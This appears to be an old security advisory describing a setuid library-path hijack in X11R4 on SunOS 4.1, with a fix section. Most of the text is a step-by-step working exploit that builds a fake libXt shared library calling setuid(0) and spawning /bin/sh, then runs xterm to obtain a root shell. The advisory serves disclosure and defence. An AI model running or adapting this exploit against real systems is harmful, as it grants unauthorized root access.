COMMAND

    X11R4

SYSTEMS AFFECTED

    SunOS 4.1

PROBLEM

    X binaries are  linked with   -L options that  are relative names,
    like  "../.././lib/X",  and  ld.so  under  SunOS  4.1  trusts this
    link-time library  path even  on suid  programs.   This is why the
    next  ten  step  procedure  works  on standard X11R4 installations
    running SunOS 4.1. Pathnames may vary.

        % mkdir /tmp/xyzzy
        % cd /tmp/xyzzy
        % cat > Initialize.c << EOF
        _XtAppInitialize() { setuid(0);
        execl("/bin/sh","sh",0);}
        XtAppSetFallbackResources() {}
        _XtDisplayInitialize() {}
        EOF
        % ar x /usr/lib/libXt.a
        % cc -c -pic Initialize.c
        % ld *.o
        % mkdir lib lib/X
        % mv a.out lib/X/libXt.so.4.1
        % cd lib/X
        % xterm
        # whoami
        root

SOLUTION

    Recompile xterm, xload and  xcpustate with UseExisting defined  in
    the Imakefile.  Define TOPDIR  to be  an absolute  path instead of
    ".", and remake. Relink xterm and xload with the -Bstatic  option.
    Turn off the set-idness of xterm, xload and xcpustate. Get X11R5.